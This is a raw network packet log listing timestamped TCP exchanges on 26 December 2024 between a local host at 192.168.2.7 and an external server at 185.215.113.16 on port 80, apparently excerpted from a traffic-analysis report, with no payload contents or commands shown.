Dec 26, 2024 12:41:45.930305004 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:45.930388927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:45.930438995 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.014507055 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.014600039 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.014733076 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.016161919 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.016177893 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.016232014 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.019459009 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.019539118 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.019587994 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.022870064 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.022945881 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.022994041 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.026433945 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.026557922 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.026626110 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.029434919 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.029603004 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.029648066 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.032699108 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.032816887 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.032860041 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.035943031 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.036010981 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.036056042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.039098024 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.039195061 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.039261103 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.042239904 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.042325974 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.042375088 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.045375109 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.045397043 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.045450926 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.048657894 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.048762083 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.048818111 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.051547050 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.051558971 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.051623106 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.054613113 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.054737091 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.054795980 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.057444096 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.057480097 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.057532072 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.060322046 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.060404062 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.060467958 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.063143015 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.063323021 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.063380957 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.066028118 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.066041946 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.066091061 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.068891048 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.069072008 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.069123983 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.071794987 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.071880102 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.071942091 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.074645996 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.074765921 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.074810982 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.077503920 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.077619076 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.077672958 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.080591917 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.080657959 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.080705881 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.083370924 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.083422899 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.083477020 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.086298943 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.086433887 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.086487055 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.089852095 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.089920998 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.089976072 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.092966080 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.093072891 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.093139887 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.095740080 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.095861912 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.095967054 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.098243952 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.098306894 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.098361015 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.100615978 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.100722075 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.100766897 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.103379011 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.103444099 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.103512049 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.106245041 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.106369972 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.106422901 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.109127045 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.109219074 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.109272957 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.112128973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.112232924 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.112278938 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.114840984 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.114903927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.114952087 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.117738008 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.117786884 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.117839098 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.120615959 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.120717049 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.120762110 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.123500109 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.123591900 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.123667002 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.126420021 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.126523972 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.126588106 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.129244089 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.129349947 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.129411936 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.132097006 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.132318020 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.132369995 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.134963989 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.135082006 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.135133028 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.137957096 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.138030052 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.138094902 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.140795946 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.140944004 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.141002893 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.143650055 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.143780947 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.143834114 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.146488905 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.146596909 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.146645069 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.149339914 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.149544001 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.149647951 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.152329922 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.152446032 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.152493954 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.155092955 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.155340910 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.155388117 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.158044100 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.158119917 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.158184052 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.160881042 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.160965919 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.161029100 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.163702965 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.215732098 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.225087881 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.225260019 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.225346088 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.226020098 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.226128101 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.226283073 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.227904081 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.228023052 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.228075027 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.229971886 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.230065107 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.230108976 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.231817007 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.231869936 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.231909990 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.233716011 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.233794928 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.233844042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.235714912 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.235789061 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.235841036 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.237476110 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.237597942 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.237662077 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.239413977 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.239428043 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.239465952 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.241209030 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.241254091 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.241296053 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.243100882 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.243240118 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.243285894 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.244894981 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.244905949 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.244951963 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.246666908 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.246748924 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.246793032 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.248469114 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.248480082 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.248568058 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.250281096 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.250327110 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.250387907 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.252019882 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.252031088 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.252077103 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.253766060 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.253850937 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.253904104 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.255537033 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.255548954 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.255614042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.257232904 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.257299900 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.257352114 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.258932114 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.259041071 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.259115934 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.260678053 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.260742903 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.260803938 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.262403011 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.262464046 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.262520075 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.264024019 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.264133930 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.264172077 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.265161991 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.265327930 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.265367985 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.266413927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.266529083 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.266576052 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.267586946 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.267832994 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.267884016 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.268579006 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.268682957 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.268733978 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.269440889 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.270632982 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.270643950 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.270673990 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.270700932 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.270729065 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.271505117 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.271584034 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.271629095 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.272521973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.272562981 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.272604942 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.273533106 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.273647070 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.273695946 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.274333954 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.274391890 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.274439096 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.275648117 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.275666952 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.275708914 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.276442051 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.276465893 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.276505947 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.277442932 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.277524948 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.277569056 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.278438091 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.278512955 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.278561115 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.279474020 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.279644966 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.279687881 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.280463934 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.280591011 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.280632973 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.281543016 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.281656981 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.281718969 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.282541990 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.282633066 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.282680035 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.283603907 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.283682108 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.283727884 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.284571886 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.284689903 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.284739971 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.285562038 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.285661936 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.285712004 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.286577940 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.286709070 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.286748886 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.287605047 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.287705898 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.287749052 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.288661003 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.288757086 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.288799047 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.289668083 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.289810896 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.289855957 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.290668964 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.290719032 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.290771008 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.291702986 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.291847944 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.291941881 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.292711973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.292807102 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.292853117 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.293770075 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.293781996 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.293818951 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.294759035 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.294850111 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.294894934 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.295736074 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.340743065 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.435540915 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.435678005 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.435795069 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.435961008 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.436049938 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.436161041 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.436814070 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.436963081 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.437016010 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.437690973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.437803030 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.437849998 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.438601971 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.438607931 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.438657045 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.439410925 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.439488888 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.439528942 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:46.440313101 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.440435886 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:46.440483093 CET	49768	80	192.168.2.7	185.215.113.16
